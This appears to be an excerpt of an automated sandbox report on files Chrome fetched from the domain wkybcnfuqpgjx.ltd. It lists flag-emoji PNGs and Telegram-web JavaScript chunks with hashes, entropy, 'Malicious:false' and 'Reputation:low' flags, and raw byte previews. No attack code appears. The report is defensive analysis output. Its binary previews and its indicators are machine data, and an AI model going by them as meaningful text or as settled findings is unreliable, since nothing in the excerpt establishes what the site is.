                                  Preview:(()=>{var e,t,s={6453:(e,t,s)=>{"use strict";s.d(t,{A:()=>n});class n{constructor(e){this.isUpload=e}}},3559:(e,t,s)=>{"use strict";var n={};s.r(n),s.d(n,{Type:()=>_o,clear:()=>So,fetch:()=>bo,isCacheApiSupported:()=>yo,remove:()=>vo,save:()=>wo});var a={};s.r(a),s.d(a,{abortChatRequests:()=>Pd,abortRequestGroup:()=>Cd,acceptBotUrlAuth:()=>Xl,acceptCall:()=>Ap,acceptLinkUrlAuth:()=>Zl,acceptPhoneCall:()=>ff,activateStealthMode:()=>Uf,addChatMembers:()=>wr,allowBotSendMessages:()=>tp,answerCallbackButton:()=>Dl,applyBoost:()=>Lf,applyGiftCode:()=>$f,blockUser:()=>qu,broadcastLocalDbUpdateFull:()=>De,changeSessionSettings:()=>xd,changeSessionTtl:()=>Vd,changeStarsSubscription:()=>rg,checkChatInvite:()=>br,checkChatUsername:()=>fu,checkChatlistInvite:()=>Vr,checkGiftCode:()=>Kf,checkPassword:()=>Cl,checkUsername:()=>Eu,clearPassword:()=>Ml,clearRecentReactions:()=>Fp,clearRecentStickers:()=>Kd,clickSponsoredMessage:()=>Fc,closePoll:()=>Pc,confirmCall:()=>Pp,confirmPhoneCall:()=>pf,convert
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4452
                                  Entropy (8bit):7.911722928299787
                                  Encrypted:false
                                  SSDEEP:96:Oy0OMIS/GiMJi8tqlmmPB3d1I2+3/8HB4cYJizYc6ACUq+Xe3:Oy0/Iuf8IlZFHi/8HKaR6ANlXe3
                                  MD5:051EE485409B33161B235C641153510B
                                  SHA1:B0782D35AEE07E4F8F3947FA6DF10BDE2678D01F
                                  SHA-256:34D51AA9E708D4D41C9EDE8DF21EA884A143C35DECFD3E5AF683E45642EF9F69
                                  SHA-512:906204830A0F9AD428F6FF70F3E86667E3A3B340EE4201A2FAE97D555144E0DE4D3405254502AD899F0D64759B3AF26578F9E6340C46DBADDA90ED2FF879B600
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.YY......}...gg.....y......[[.....t........ZZ......u...........**.__x........y...,,....aa...{__t........u.....UU.dd......w........``z.....v........//....]]v.........................................................................................................................................................................................................................}}.......oo.......]]...}......PP....``.vv.EE.\\.XX.::.RR.NN.33.gg.EE.HH.)).AA.&&.77.&&.%%.99.$$.%%."".77....11....**.;;..........++..........&&.... ...................))................................................................................................................................................................................................}...........z..t..}C/....9tRNS......'(+36;>HOOXacdgjmlqt{~...............................P.....IDATx..........93....6d.&...B..kI.... h.y.x.........P...S......-..A.....M.n.d.u|..9...c..k.....y.....3c-...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3967
                                  Entropy (8bit):7.9161902528770165
                                  Encrypted:false
                                  SSDEEP:96:qWKraYRAaNkTMpTf4tmGF/kbYggPYIIj/Hd91BJPBkuu:/Y+ehpTkmGF/kbYLYIIj/Hd9PZBkV
                                  MD5:7C2E17752191464C9A0F10AD6ED4FBF5
                                  SHA1:A29809502CE3D18627EBC792093AEF7E0CC744F2
                                  SHA-256:0259029DFE895ABDC3C82B055ADBAEC2AB5BE7324067C968C9E5DE20F6757903
                                  SHA-512:0E876038F55A9218455E0B5789D9DAADA0B76E51A9043BED0B40985AD4C4484CF1FEA2309ACD5484A62ACBDE0A5D0B062806C910FA0EB0DD85E838BAA7934258
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL....iq....el....nv....mu....CM.nu........,.......3?.go......v......-7.lt.......CK.ow....el....px.......ip....7A....qy.dl.................................................................................................................................................................................~...........n..............^........Q.....I..=.....+..............................z........r}....iu.qy....mv.ks.Yf.gp.cl.fn.^h.cj|yy.Xc.Zd.Q^.]e.T_.KY.Xa.KX.ES.R\.MX.?N.DQjjj.KU.9I.CO.<J.4D.3D.3D.3C.1B.CM.0A.5Daaa.=I.0A..?.6D.,=.,=.*;.%8.=G.,<.)9.4A.0>.&7.%5.!3.)8..0."3SSS.(6. 1."2../.0:..*.!0..-...."1..+..*..+..(."...'..(FFF..!..%..#.."..*........!{#................666......~.....---w..&&&%%%$$$""" .........................................................&...*tRNS....#,7CGSU`ccccklsy~~~.........................IDATx...s#.}.......>..f....%9.J.Q.\...C..9...r.-U>.k.9$..].....\zQ.].."A...L......A...\.<..3.T......3."jjjjjjjjjjjjjjjjjj
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4319
                                  Entropy (8bit):7.895133297283278
                                  Encrypted:false
                                  SSDEEP:96:kFQ7JPpPZVy9SKbsBaFwIcYETZHpgN3LR5sEAPQfL43:YaJPpRs97EADcbu5a+q
                                  MD5:8A607D98461F53B98D68D51AFA363A55
                                  SHA1:E7F9A7A842DAD318C369A9C6F1CE04ED9BBF683D
                                  SHA-256:108931580AF025093063BE3B9A5F0CCD77FF15746ECB195D7E134577A23740D7
                                  SHA-512:731084B167E00358752D57975A12555F5CC85768E8E23626C3841A8D46432D7B6D5D2A247B94E36DF0850C260869711CA9DB5215388ECC82BBA037C41C0195A2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.6Eg.%....erd.!g.%...mzb...nyc. .HV.iu.....1.o}.,@Z.....k.'.co...y.0p..c...ftc.!.o}~~~.@Q`.....`o.jxl>Gh.&...]......p..cqe."...lz.q.f.$.n|.ao]...||.6I....................................................................................................................................................................................x.....w.....u..k..i{.o}....jy._s.Wp.ft.br.\n.ao.Uj.[j.Kd.Ug.Nd.Ve.F_.L_.;X.@Z.O_.E[.:U.HZ.>V.4Q.0O.0O.0N.1O./N.5P./N.@T./M./M.-L.-L.;Q.,K.,J.+I.,J.3L.*H.*H.(F.4K.(F.$E.*GxJS.&D.%C.*D.$B.-E."A.&B..>.!?.%@..=..<.%>..8..:..:..9..8..:..8..5..7.$;..6..9..4..5..1.&;..5..3..4..3..1..5../..0. 6../..0..2.....-..*..-..,..+.....1..+..1..*..)..)..&..+..(..(.....(..*..&...x.,..%.. ..'...q.*..#l.(..... |.!s."...h.!u..p..a..f..\..4.s.....tRNS......+36>IOV\ccfgfhhx}}~..............................................................................................................................IDATx..K.d.Y......VUW.<=..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5605
                                  Entropy (8bit):7.9458577511476625
                                  Encrypted:false
                                  SSDEEP:96:HgHxbq0OMHXMHamgRJWoGmuurv+wcv7C14UxPSVvqryMixBsus:AZXOIYMRJfGgev7IPSVvzNxBsB
                                  MD5:2770C03FCC42EEFFE061CB0E4C7F128E
                                  SHA1:9CE5EE94F505B3A8C0461B5F8854635E5592BEC2
                                  SHA-256:D8721BEC3A35C4230110929803B476EB8775D08B91003A3C4F9B791E0711D715
                                  SHA-512:8D6C3C74C18AE3A66D00B13C4198711B99EBBA5455A909068ABD0C6FFE6744185BE606AB48F01E19551D51753C89766832B40BE962ACAF52906DB8CC7F21C549
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLh...g!).8...'~6.f!.nu.v|sssh..h...rx.pxi..h...iqh...qy....qwh..h..h...rz.ltv6<uuu...............l.#sss.go...xyx.......b..fn...tttvvvmXZ.t%.......3D.3C..0..6.....6(.?...#.9+.B..4..4.,=.....1..?..0...$.:...2.I-.D.1B%.<./@..4/.F.......(9....1A...!1.......+<.&7.......$5...q.#......).>...............&.>(.?...$.;.x&!.7!.8.f ../4.K.....*,.?../..-*.A..1..0'.7'}7,.A....*:~.&0.G.+;*.<8.O....5E.lt.7G.k!....=L.DS..'./?..........R^....#6.)8.KX.dl.!,..,....Ze.........*."-a....).gp.. .(5.DP....qy.......MV.&3.cm.NZ.j"."1...r..........%.\e.7D.Xa._i%{5.........xyy............@J..-.......=K*.;.....7.Wb.."~....0.,C...'.@.....5A.....'....U.c{...n.y......oL....v.!.:P.c..u.b......F.X,.@..b.s.........U9......1D..8.....}.]j...Y.Vz.O.ht8.I..<....\....`.Q|YyIOr?-..Oc.../tRNS..~c.c~c....1..o...bBQ7....d}..n.......H~....c.i.n...eIDATx...k.Q..q.Wt. 6C.....Y...@."t..C..JB..S[:t...A1..b..Tr..%`P...#.p[q)i.@)tq).J.....^.$....}.......=.....p8.....p8....4
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65453)
                                  Category:downloaded
                                  Size (bytes):73118
                                  Entropy (8bit):5.375340520479466
                                  Encrypted:false
                                  SSDEEP:768:cVA2f7aRt98PzulV1096Dt6Smz2eVIa7qfzAA+f+KUFCq81f/oCKfTAdTAGiYUCp:CmF8rubCExL8lpD/oZbSl94tf97k3b
                                  MD5:371C55C21420E77D6600E4FA43692103
                                  SHA1:5ADF626B2E9C9589C090F1B8725191262D13536B
                                  SHA-256:EFD30D40DB473B3F19FA9EF94F7A0E7CB4FFE839D38211E4AA1772DF4004040A
                                  SHA-512:8E29BD4732F5F7BA872BD485D74B5A4CC38F2EB8FE2DE65EBBFA9F2F66200AC75E5696B52E8B939CE04AFA1E83104D5869647576D633F58AD7B6512E97E7EEE7
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/5648.343cae73c4dc2e71af86.js
                                  Preview:/*! For license information please see 5648.343cae73c4dc2e71af86.js.LICENSE.txt */.(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5648],{7692:(t,e,r)=>{"use strict";r.r(e),r.d(e,{CTR:()=>d,IGE:()=>v,default:()=>w});var n=new Uint8Array(256),o=new Uint8Array(256),i=new Uint32Array(256),u=new Uint32Array(256),s=new Uint32Array(256),a=new Uint32Array(256),f=new Uint32Array(256),c=new Uint32Array(256),p=new Uint32Array(256),l=new Uint32Array(256);function h(t){if(t instanceof Uint32Array)return t;if("string"==typeof t){if(t.length%4!=0)for(var e=t.length%4;e<=4;e++)t+="\0x00";var r=new Uint32Array(t.length/4);for(e=0;e<t.length;e+=4)r[e/4]=(o=e,(n=t).charCodeAt(o)<<24^n.charCodeAt(o+1)<<16^n.charCodeAt(o+2)<<8^n.charCodeAt(o+3));return r}var n,o;if(t instanceof Uint8Array){for(r=new Uint32Array(t.length/4),e=0;e<t.length;e+=4)r[e/4]=t[e]<<24^t[e+1]<<16^t[e+2]<<8^t[e+3];return r}throw new Error("Unable to create 32-bit words")}function y(t,e,r){void 0===r&&(r=t);for(va
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4880
                                  Entropy (8bit):7.923387249517334
                                  Encrypted:false
                                  SSDEEP:96:3sfOnueJs5mygVBh+s+2WjgxtwGTy7vmJJ1pdPmk+iDnU9MTvQ6jee:oIu3gVB5JtwFjoNIk9nnTvFl
                                  MD5:EF0FF0A8FD312B515E82F79EA344A2DA
                                  SHA1:E12E6292DE09D94E1D22C86FDA7FE8F30992B3D9
                                  SHA-256:6C9A06EDA0278A45C2B8B71701FBD3D77FFCE2DFF201179BA8B4F5CE5E6821BE
                                  SHA-512:6E585934BD10F5834554D62F6063CAA5285B8A9918F9BEF35704B1A2FC24C442365D31D4EBB870FA4474F20DE89667B15E9E85CB39DC36B94344E4D9A8266F81
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.rA.}N..|kZ'..shX$..|..~hX$..~iY%..p.z8~k0...hW#..ubR..p0xb!.y?..x...iX%..U..|hX%..~..q..}gV#.....up_+bR...z...o^*.....t^N.cS ..@.._..[..Y.J..X.W.V..z.U..w.T.S..u.F.R.R.r....Q..y.P..}.P.X.O..n.G..y.O..l.L..u..h..U.L..r..V.I..`..k.J..^..d..k.G.F..\..u..]..U.D.}]..W.yA..Vy.Y..s.s@.j=.kV.uP..;|.|.~9..:.c;j...\9.y7.}8.dI.XP]z..R6.w4.q3}t&.J4.UCzr/|r&.g3.HIDt..C2vl,vf-.:/.9?.\!.D>.U/.[ xb!ra-me$.4;.21&k.o^).,,.-.{U!.58.),.G).)+.N$..5j[#.(+.'*.(+.'*.&).$*.&).'*.$(.*0.!).$(.&(.<'."&eU.."&.!$..(.!%yG..."..'.."..!.%,."%..#.. ..!_O..:.........%..#./". $..............(........ ...|4...... ....# .........................................................|%............................................................................................LE....-tRNS.....%14;CLSWccefvx~~.........................x.|....IDATx^.....@..@%...~.T-..3.......8k..$y..~.u.....:.M#..8^.J.b.i..0.AQ.m"8...8B....%...I...........%C......B...X.NT...8...A.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4145
                                  Entropy (8bit):7.880975234082769
                                  Encrypted:false
                                  SSDEEP:96:mlB33Jz+uEvp/kDlsymIu6cqc97xNHiOJBpbqk+vOSpk:mlZop/q83qcHIOJBt0Rpk
                                  MD5:1CA1F352550D602D48A64C1378B6D540
                                  SHA1:C2530372AF592A0DBB5140DEF40FAB79BE85D7BA
                                  SHA-256:E4201ACC2E841D0145D35178A61579C1C3D7C86C68715893C0ACAF7E82D8FB08
                                  SHA-512:6038FC80021D41BFFFFC8369D3983164E018C44BBD383FB48EB9DF07AFAB816E243333F15EC5221B4A94983C3160AF887BF18AF2B765738883D72D644A4837F3
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...}.....lv.}..ruyz..|||t.....|..zzz{..Wt.~~~......w..8[.......ttt|..z..vvv......:Pn!Cp...?^.x..rrr......Up.wwww.....www......v..www}.....Kh....uuu...t............................................................................................................................................................................}.....^..y..r.....l..s.....Y..t..e..i..r.....V.._..W..n..g..Z....\..V..V..V..^..U..N..j..T..~~~S..c..V..L..Q..\..{{{P..S..a~.N..J..[~.L..wwwS}.F~.L}.J}.I|.Wy.H{.sssIz.A{.Ox.Xv.Fx.Dw.Dv.Ls.Ft.Bt.@s.:s.Aq.?q.On.<p.hhhAo.=o.<n.@l.:l.9l.Fh.8j.=i.7i.6h.4g.5f.3e.2d.;b.\\\1c.0b.@_./`.3^.-\.7Y.-Z.5X.9Uz*U.LLL)P.0Nt&M.4Id"Es!Bo<<<'>^,9J.2O+/3&&&.';%%%$$$###"""!!! .......!........../...............................................................%cp.....tRNS.......%158>IRUWccccceekyy|~~~~.....................................................................................................................YuGY...LIDATx.....6.@.C^R..2i.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4512
                                  Entropy (8bit):7.922377797563786
                                  Encrypted:false
                                  SSDEEP:96:ZirDNrFUaAqGAu8mxVm3B8nv4PB9Nmsufm5s1Z7OlLMn3mLi:4r5FUaMmx8ALufm5s77Osgi
                                  MD5:B0D31BDC344B2549271F571F89A6862F
                                  SHA1:F4E569CE18C93876593ED3997C3C91B4E71395D6
                                  SHA-256:51185235AA6568D1E9B7798D469BDE7A2B022E4799295F57B8131A6D731B4861
                                  SHA-512:A4EED22323ABDCAB4ADBCEE5CFE93EC92E886F4D2C515E9E5577DDF26E2DCD8AF1EDD04F273DD006AEA0CB9D0ED5BB564CB510C623074D4980D87C3251C4B7D9
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.(...f``.q...oO..rbb..0=..Y..S.jgK.5..l..lxjbR.(^_...l..kD./h...ng.nh66..ki...r..lf..V.q..r..r...l.s.m...r..og..T..V.r..t..s..s..haZZ..PH__...l..h..ULL..................$..$.............. ...........!.....$..%..%....)......... .......#.........%.(...$.%..$.....2$.&.....!..- .. .!....., ..!..w.,...k.....e....."..&.+ .'...........0".......&.WP..('....+......!fUA.D).......-...V.h..$.u.....^.....!.qH..$..1..E..:LF8CC..kd.aZ..#p\A.iF..&D?7...523..$66..."[N?.. . **.|v3..$...{cB......!.;4NO..%.o....X.......H?./"WW.......~....$..B.. TN5.z...7h............SK...B8:\W2..a..S..#.. ..#.......|K.B&.NA.A7..$VB?.|?..Jqg1$"4....q..6*..1..L4+=.......?A.....+`a8.........qn9.YO `....->O:Yi!!..ZO.x..n..3@../c.m."..o;..K..)-I@KXE1s..D=..A../."AQ <..(++.XnZ..,.I~...yu...&..,....5tRNS.c~........5..;!,.e.C.~]...>.....|T._.j....Wbn..m...Q....IDATx...?L.a..qZre8..&..K.6.5m........*)5.jk..j.....B....#...S'..L:.......,79h.{....s.F#qx..w..y.. ..D".H$..D".H$.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3814
                                  Entropy (8bit):7.905543938468768
                                  Encrypted:false
                                  SSDEEP:96:rULF5xCxAkc0hYv/XnvFXp4GOqUG7FZT1H5tkyzuS0p1SO/G:rgMxzKvFXlOGT5kyY1M
                                  MD5:D875A434B32A68B5960F6F56033C8C5E
                                  SHA1:EECFEC9532265D072CCD025F961C4D0A1F64D799
                                  SHA-256:6EC05F48DEA5E9ECE9EDA983869F24A507D1C998CB49A623B5E3FBC192743141
                                  SHA-512:0593536A66871C20AF3D9B82CB75E3C586938EA44D311849D166651FC36E20756BAA59E76A34DB2C7F3D93E6839DD5CAC38F1ED40014E725B7C523D88673837E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.p`....da..a...ma...o..^}),..!.T>..'\...mc...k.<N.j...='.i..4a...pa. .i`...r..ga...qd !..F.s..eZ....0..1..6..5..'..4..5.A..3.L..1..".1...<.W.-.J.4....*.).\.(.9.G.p.%....c.$.k.".K.8.^...+.....f...2...N.@.Z.$....@..`..."...1.?....Y..M.....#........I....?..1....!..G..9........#u.J..!..+.y.Y.Qs.+.@H.DI.GK.m..FJ.FJ.PN.EI.EI.AF.CG@.T.i..BF.:B.]R.@D.RL.WO.BEtbS`t).>B[lW.GE.<@.4<.>A7yY&.`.:>%._CpW..`.8<Ft7#~^..a#}\.7;!|\.;>.IC {Z.-5.48.yXOaL.xW.8;.wV.15.37.yc.|X.vV.04.uT.79.25hQ=,nB.;9.sS.'..-1.25.rQ.-1.ub.wS.*/.36.oO.)-.mM.pO.',.)-.&*.lK..&./2.*-.hI.%*.mY.iI.#'.lM.#'.cE.hH.gF.!%.-/.!%.eE..$.&)8N7.)-.cC.[Bz--. #T>1.aA._@.^>{&(..!..".S=s').\=.[;.Z:| #.XD.Z9.Y9.V=j$&p!$}...Q@.T5a%".N3e.!p...G/h.._...='Z.......%tRNS...../5EKXaccedgn~~~~................^..O...pIDATx...Ko..y...\./l..d.d..6.g.8p6.. .b....E6..Y..d...l.}..,..0&.......-Q.Ku.9.;&.,..U.n..g`.+...Y..s.Ts.dllllllllllllllllll_..Mic<...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5314
                                  Entropy (8bit):7.920120484495195
                                  Encrypted:false
                                  SSDEEP:96:b+EL1HPl0jOoyBc7nTx8bQEUvXmMOi0dEbLlFSootIS:1BHd0j7y7l8ZEGLytR
                                  MD5:67B5EF5CD4D6A894B1C383707CE1F41D
                                  SHA1:807E87C0EECFB9BE3208916783EF5C021F4E386D
                                  SHA-256:F22EC8F87CA22A947415CCF5186F2EF5620D6521F97B83B1056FB60F41858406
                                  SHA-512:E03B91A540797B2616BFB45F66D44A38A103067B8279056CE7469DE6508202C3993DA38DCDA47A3C647E16E0411E470369FE43D958C4364996E4D82DC6C63E48
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpLEVEDRD*D*IVI.8.fff.:....fhf....L.....8.MMM.8.ccc...okd.8.l........aaalll.4..=.llleee.9..;.dddRRR.8.jjj.6.bbb.:..<.///kkk]]].4.................................................................................................................................................{{.......qro.q.xx....ll.eej.j|~{.XX.ccY.Yf.f.RR.EF.NNkllD.D^tPfff.;;>z:```.11]]].A?.%%YYY.$$Lg'%{%..!..$.%%%z$.&&#y#UUU.%%<f<"w"_W!.##RRR. t .!!.&&...OOO.r..p.......LLL.j..n.....&&.m.......IHH.......e..k.....h....EEE.%%...CCC.f..c.._.......AAA....c...........X....>>>.`.y##....X..^....:::k%%....[.....P.....Y.666..........W.....V..J.X$$.R.....T.111....O..C.......F##.J..F..@.,,,...)))4$$.C..;.}..&&&%%%.<.###.%%.8.!!!m...4..$$.%%....##.0..##....%%........................................+tRNS..."5CNScccbcfjvx~..~~.....................YdA....FIDATx...i..Wa.....{..$.ed....1...R....a...J...T*.PT*..).T.*r...|.....nR....6X...d[..E.....9...{/l{.Fk.d/...a.5..|...~.{Z3..7n
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4584
                                  Entropy (8bit):7.918304740736297
                                  Encrypted:false
                                  SSDEEP:96:Y0CFgRZ5hE6dH3+hfFAB5dDManUru2WfZq5Q52n2o5lWuB:Y0C2j5n+NcHUa7xqn2o5ld
                                  MD5:6F637A60248BE27639AC439C8E05BEED
                                  SHA1:4072F71C2EFB105418E3128D114DD6DBCB7AE616
                                  SHA-256:D25C6863FC5BE6B88D3AAE67D642815E682B97424C4E1414F83E4032DCD94D8B
                                  SHA-512:668393E7B2EE4E46BD619ECFDDE00946CFBC9AB6510303D8BE41AD51BAD5492A2BA3E3B1FE464A77B4166FBCF27DAF17E9E609BEA4BCCCABBF6A91E8A59ED33B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.X.. -......u..T`T3o3IZI888ggg7S7M`Mhhh.L.iii%Q%.K.#R$&M' O jjjaaabbbccc!Q"(W(ddd#S%(X)"Q#(Y)hhh/(....<<<.4E.......3DP.R..........0B..?.....&.(9O.QN.P.......%6..$..*,....0.3D......../.....).#4.*;..+J.L......P.R2.4.../.14.6...N.P..#6.8"##.2C.->K.ME.G1.3...@.B..-.. .!2+.-8.9I.K(''A.C...;.=___C.EF.Hy..9.;*.,..!2o3=.?.,=..+...<.>+++..".#"BBB.X.FGGQPP&X'7|8@&)#h%(d).5ITTT)z+.]!;.=+`,<.=LLLq+2:.</00&t'.4GL'+.4G."1.K..N.*[+.i0.Q c*0.!.."1......'o(M.N2%&.!.*~-$U$...344ccc...[[[.....04.4.u/|,4.-8..#..<. 0."14t6XXX.0<.)2...I.KB.B?>=V).9 ".)A.4E.H...'D.DF.G..7.#9jjj.2@..,.......!A:;;..BH.I.. ggg?.A..3@.T.2D9.;./B?.P.3H-.@I.RL.!l..bs9../6.G666.4Cv"+..>;.<..'Y%*}<3f%,^ %.AK.[F".4M..2..Ov3(..>.>(.;.'1.lIrK<.JM.;A.KE\g2*.4.;@a.P...v.LFQP4..\[*~qDc.FUFG+.9e=<QYX.HWo.P~~K.h.i...$tRNS..cc~~5c...".e..h.N....y=.S..w\..~...8....sIDATx..._H.....r...*..T._z..j...-5......}(.>..P.;b.....2...&P.oaf...\p. .........&.1..A.}(.>....3c..v..j...........s.B...*T.P.B...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4705
                                  Entropy (8bit):7.932152300086477
                                  Encrypted:false
                                  SSDEEP:96:CDPFsTFrTg/H7SkuXyRofv7mjZbRLzWW+lRMCY/MwFbci6WcQ7:Q9UJYonK9blzWW+r2xAC
                                  MD5:F44926EE73B2301E2817848675A8C60E
                                  SHA1:02C17511B14E855A27F86868FA5CBE29C48C299E
                                  SHA-256:E812F13A179656F2ECF05CA4F0C4BB33569B0197211535AD10B9FC4CA0F0B1A1
                                  SHA-512:BDBF897FCF6038ECEF01EB43CDA79AD17935897EB09702D0BEBF630BB5A86E698EF26596B5CCC880ED4E0F2479A83E5D5F932B65A6A743E87DAFDB8500D24FF5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f3.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.}.x.{..p.}.s.v.|.q.v.~.{.M..t..........sA.k9.xE..R..`.V..o4.......a..L..A...q.N..I..G..H..F..H..G..G..G..F..A..`.O.D.<.9.3.1.1...z9..X.F.7.4.-..+.}*.o4..N..L..J..H.=.:..O.C.@.l2.`*.X..e!.o%.v(..O..P..P....).$.|...:..5.u...B..q.................................................d.........................................................................................................................................XX......u..{......++.......::....GG.nn........cc.ww.................t.n^.WF.>3.*/.'"........+.#w.s...L.D5.,*.!%...y..{..v..t..q..n..i..b...4.+,.#...(...|..r.#}.5.,1.(2.)/.&6.-/|(s.pC.:$x..[.#m. c..D..N.4.+.q.&s..g..[..V..T..O..J..?..V.|.G..l.`..c.S..T.Q.I.=.:.q.w.Y.\.d.=.s.@.j.h.a.nD`WJ...+tRNS...5Vev.>%.......c.....~c~~b}.....dE/....T..Z....IDATx^..Io.@...6.$@E.8....g.f...d.\z.......[.........p_....Z.D+)+.*n%.\o.&2f>;l....Y.J=R..Z.mKX\&.9SW...m.l2-......,...m).
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5347
                                  Entropy (8bit):7.940513274274703
                                  Encrypted:false
                                  SSDEEP:96:ay0598manohkubkRFlY7OIhzC1LAxlmFThThYY/MereEXY9IWSiIgkrtNN:JA96op8TY7OIh+ixcFgcMHEXY9IbPg6N
                                  MD5:AD0A8CB4DF90BA1BBF75BF420DB2AF90
                                  SHA1:5C10A9A2F728B22835FC29D8350A74819C84264C
                                  SHA-256:EB486CE718AE68522FAC35F6A1FC0A039EF6CCD00790886BF313B245AE87BBCF
                                  SHA-512:AF6A04B6E097F03C52E0C70415013D1CA6A9897C097B04E98169E3DB7F8799B237CEDA9A7380745D7FC67566CB38E0FA9E6CCE453D1A1822F595F02E790346E8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLe.p&Fk'Hnk.un.x(Hm)Hnj.t<c."z0(HnV.>i.r/Gj.....(k.v(Hm)Hmi.s&Fln.w,Lr ?er.|e.o.Ms!@ffn<..6..4..:..;.....:../..*.5..'.6.).:.).=...:..,.>.,.z=E..`..L..\...q<.z-[..Z..Z...j>Y..B.UV..T....HY..(.H.j/:.N.`>9..4.J..IF..Q..4.I.k.}x.3.HN..3.HQ...]5/.Di.N..?.QFK....C..?O..\.H..5..*.?F..z.N.gP.O7E..[v.(.=K}.G}.A}...6.AE$.9,..?z.Ex. .6=y..NQ.8d.W..jI..1..4.C5;w..1W..3<t.9t.Br.[f..)U.=q7r..98.)U../.(SAn..#T6p.P{4.&R..,.,F.%P..%..M.ZC.$O..*mT...S.#N./:4k...@;h...(.!L.F..8E".2%.4..%;e...J..I..E.H?..$.&S..$:b...H1b...E."8..N..E7^...?..C.4hhU-.y...H.73.&K..@4Y...?..A.Y...M..=..8..<..E2T}..9..;..7/Pw..8..7..2$R...5..4..?..E..3(Lw..;..<..'..1)Hp.....0S5]..5...!Dk..+..*..).?e..&..$X.<..!...{..B.OG.QO.Z-.@S.`O.Zh.s4.D<.L#.6d.oU.dp.y`.j@.Q7.I'.8!.5^.kB.SZ.e;.>K.ZK.\.......tRNS...,0ADV^ccgir{~.....................tIDATx^...j.!......p!.....8....2^...Tzq......p/............ZG<q......2m.o......OOm.V..vXWi....8.}..te..X.J.D.!...z........".m.....b.D*y
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3611
                                  Entropy (8bit):7.863914536864181
                                  Encrypted:false
                                  SSDEEP:96:cfpi9dypZoL360POqTXORGcoYRolpynVOn75SQ:cfAYoL360/7tigAVO75h
                                  MD5:1E4AA7070373715C56F90B4739147826
                                  SHA1:DF0CB2272ABCD4C3BE4E17DE3A7FA0BF6421D457
                                  SHA-256:17B1FFB17AE948482CDFE8030757717D75C5158D9394B17DE2A35FFB7C9DE3AE
                                  SHA-512:28BA7B99271BF69D16D165DECFC09DEAEF2EFFC4A83ABAF41170B62A74CA92589F4F5EA5E25FF68ED7DF07694F3CF180371A43E1E126A411C9A57038AFB9D1A4
                                  Malicious:false
                                  Reputation:low
